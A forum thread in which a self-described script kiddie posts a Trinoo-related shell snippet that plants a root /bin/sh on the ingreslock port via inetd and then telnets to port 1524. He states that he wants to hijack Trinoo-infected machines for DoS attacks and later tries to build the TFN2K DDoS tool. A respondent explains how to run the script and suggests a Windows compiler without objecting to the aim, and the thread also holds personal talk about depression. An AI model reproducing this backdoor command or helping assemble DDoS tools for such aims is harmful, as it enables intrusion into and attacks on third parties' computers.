Trinoo - which language is this?

[code]./r -6 -k $1 "echo 'ingreslock stream tcp nowait root /bin/sh sh -i'
>>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob"
./r -6 $1 "echo 'ingreslock stream tcp nowait root /bin/sh sh -i'
>>/tmp/bob; /usr/sbin/inetd -s /tmp/bob"
echo Sleeping 2 seconds...
sleep 2
telnet $1 1524[/code]

I assume, and this seems to be batch, but how can you start coding with . ?
There's no command named dot (.)
Also, just to check, for the fun of it, it failed when saving as batch and opening.

I presume that you guys actually don't like supporting illegal methods, so I'm very skeptical to whether I should tell you this or not, but I also presume that the chances are slight for you to help me out, either way.

I'm attempting to abuse computers infected with Trin00 - a DoS-related trojan/virus, sort of, which makes it vulnerable to be used for DoS-attacks (Zombie).

The source of where I found this information is [link=http://www.usenix.org/events/sec2000/invitedtalks/dittrich_html/anatomy.html]here[/link].
Some more information about it [link=http://staff.washington.edu/dittrich/misc/trinoo.analysis]here[/link].

PS: I already got a scanner to find infected computers.
And yes, I'm a script kiddie.
I know some C++, php, lua, xml, batch, html and very basic perl and pascal tho.

Thanks in advanced.
Dark Fire

Comments

• Hi,

That script doesn't work, if you don't have the "r" application. "./r" means ... run the "r" program on the current directory. (That's one way to run applications on Unix which doesn't reside on the 'bin' path) And after that, some parameters know only by the "r" application users.

Which [italic]could[/italic] be this...
    [italic]PS: I already got a scanner to find infected computers.[/italic]

Everything else is a common bash script, and uses external applications like telnet. Commonly you insert #!/bin/bash, #!/bin/sh, etc., in the first line to run such scripts (after you obtain the "r" application). And change the [italic]mode[/italic] of the file to runnable with [italic]chmod 755 myscript.sh[/italic] ... and run it ./myscript.sh

[red]Good luck![/red]
    [blue]Hackman[/blue]
  • I tried TFN2K instead, since it was possible to dl the sources.
    The sources included Makefile, so I dl'd and installed Make (put in sys32).
    Now I get this error when executing:
    [code]
    C:UsersMadsDesktopdownload fn2k>make
    cd src && make
    make[1]: Entering directory `C:/Users/Mads/Desktop/download/tfn2k/src'
    gcc -Wall -DWINDOZE -O2 disc.c -o disc
    process_begin: CreateProcess((null), gcc -Wall -DWINDOZE -O2 disc.c -o disc, ...
    ) failed.
    make (e=2): Systemet finner ikke angitt fil.
    make[1]: *** [disc] Error 2
    make[1]: Leaving directory `C:/Users/Mads/Desktop/download/tfn2k/src'
    cp src/td src/tfn .
    process_begin: CreateProcess((null), cp src/td src/tfn ., ...) failed.
    make (e=2): Systemet finner ikke angitt fil.
    make: *** [all] Error 2[/code]

I google'd around and figured someone advertised a guy to use Gmake instead, only problem is that all their mirrors are FTP, so I got shi*ty confused.. I downloaded it all (smartftp), but it includes no exe, bat or anything.
    I'm with win32
  • Hi,

[Systemet finner ikke angitt fil]
    I don't know what it means.
    But, did you notice this : gcc -Wall -DWINDOZE -O2 disc.c -o ... failed

Did you dl and installed gcc, g++ for Windows?
    MinGW: Minimalist GNU for Windows ?

I suppose it has been "ported" to Windows.

Even when you can compile the application doesn't mean it will run on the OS. You can compile an application for X Processor Architecture on Y Processor on Linux. (Even X OS for Y OS) But that doesn't mean it will actually run in Y Architecture with Y OS.

You have two options, read the documentation about "ported to windows" or learn C++ and TCP/IP, actually the people who uses those applications normally has deep knowledge of what are they doing. (If not ... it's like going into the woods, without a silver arrow -- yeah, Werewolf).

An example ... I was in a chat room, and some noob sent an exploit in a JPG, everybody knows about that, he forgot to explore the possibilities (and he didn't bring his silver arrow), it took 10 minutes to reverse the process by some l33t, he still is thinking what went wrong.

Regards,

ps:
    The fact you are using Windows for it, just make me chill. I'm really not sure what to think ... that is safer for you, because it will not allow you to do a huge things, or is unsafe because it easy to exploit.
    Linux is the "swiss army knife" of TCP/IP.

[red]Good luck![/red]
    [blue]Hackman[/blue]
  • Thanks for your response, once again.
    I'm very impressed that this very small forum that seem dead, has at least one very bright member, that seem anything but ignorant!

Systemet -- The system cannot find the specific file.
    I noticed it all, but I still can't be sure of what the error is.
    Let's say I have about 9 assumptions of what the error can be, where should I start?
    In my opinion, I'm not even worthy of the title "Script Kiddie", based on knowledge.
    I've tried to learn C++ (I know the basics, and made a few calculators, and such), but I run out of energy.
    Without revealing too much; I'm depressed irl (and telling me I should go more out doesn't help >_<), and I sit on my comp like 15h a day, so I'm not able to focus too much energy into programming.
    This again, leads to lack of knowledge; regardless of that a piece of my heart burns in programming (that, and quantum physics)..

There wouldn't be a possibility that I could have a direct chat with you one day, so when I got a problem with understanding something, I can just ask?
    I learn so much faster then, because I have ADD (and I don't get ritalin yet), so when I don't get something immediately, and I don't have the energy (OR don't give preference to), and I have no easy option of learning (someone telling me <-- easy option), I change topic in head, regardless of whether I want to or not.

So I have a learning disability, basically, which keeps me away from doing what I really want: cuz I really do enjoy programming.

Regarding Linux: I tried Ubuntu, but all my drivers got fucked, and I didn't really like Ubuntu (lack of features, ugly, etc) - and the other Linux distros I dl'd didn't work (burned ISO and booted, but only a console appear. There was no command to boot it up or anything, either.

//Dark Fire
  • Hi, there...

I believe programmersheaven.com is the best forum on Internet. I find here very good people, only a few make a mess of simple things. A feature this forum lacks of, and I very glad, is the annoying [italic]Quote[/italic] button, makes more trouble than help; and it's far away from dead, even when Hacking forum isn't used very much.

I'm very concerned about you been a depressed irl (which I suppose means Irish or Ireland), and sit on a computer 15h at day... well... welcome to the 15h at day users of PC and Internet, but it doesn't mean all should be bad, there are good, positive sites. I'm know depression... been there.

I would be glad to chat with you, but you shouldn't have too much expectations, I'm far from a real Hacker than you can imagine, I can talk about controlled security environment from the perspective of a High Security Administrator, my knowledge goes more to be a software designer who doesn't want hackers on 'my' computers, (but doesn't scandalize if someone want to be one).

Regards,

ps:
    I'm very impressed that this very small forum that seem dead, has at least one very bright member, that seem anything but ignorant!

I'm the least of the last brightest mind in programmers heaven.
    I hope that you have not been sarcastic :)

[red]Good luck![/red]
    [blue]Hackman[/blue]
  • Oh, but the Quoting is actually integrated within the reply button ;o
    See, your sexy quote is right under me :)
    I do indeed hate the Quote-button as well.
    Should rather be a button to copy the link to the message (like you click Quote, and the post you're writing, is containing a link to the post you pressed "quote" on).

Hehe, irl = in real life - from the acronym rl = real life.

Oh, I never expected you to be a hacker.
    I never wanted to be a hacker myself (I own a conscience ;p), also I'm not a fan of hackers.
    I'm only attempting to be an ethical [italic]hacker[/italic], for the purpose of learning how to not get hacked yourself, and for understanding the concept of Reverse Engineering - and how to prevent it.
    I've never ever executed random victimization!

I was not being sarcastic regarding you being bright, you do indeed seem bright.
    Where my definition of bright, usually is focused on the ability of not being ignorant - which is my greatest enemy really.

Thank you for your time, and I'll eventually, and hopefully visit Programmer's heaven in the future as well :)

Programmer's heaven should be obligated to give everyone like you credits for their visitors :)
    //Dark Fire

-quote-

: Hi, there...
    :
    : I believe programmersheaven.com is the best forum on Internet. I
    : find here very good people, only a few make a mess of simple things.
    : A feature this forum lacks of, and I very glad, is the annoying
    : [italic]Quote[/italic] button, makes more trouble than help; and
    : it's far away from dead, even when Hacking forum isn't used very
    : much.
    :
    : I'm very concerned about you been a depressed irl (which I suppose
    : means Irish or Ireland), and sit on a computer 15h at day... well...
    : welcome to the 15h at day users of PC and Internet, but it doesn't
    : mean all should be bad, there are good, positive sites. I'm know
    : depression... been there.
    :
    : I would be glad to chat with you, but you shouldn't have too much
    : expectations, I'm far from a real Hacker than you can imagine, I can
    : talk about controlled security environment from the perspective of a
    : High Security Administrator, my knowledge goes more to be a software
    : designer who doesn't want hackers on 'my' computers, (but doesn't
    : scandalize if someone want to be one).
    :
    : Regards,
    :
    : ps:
    : I'm very impressed that this very small forum that seem dead, has at
    : least one very bright member, that seem anything but ignorant!
    :
    : I'm the least of the last brightest mind in programmers heaven.
    : I hope that you have not been sarcastic :)
    :
    : [red]Good luck![/red]
    : [blue]Hackman[/blue]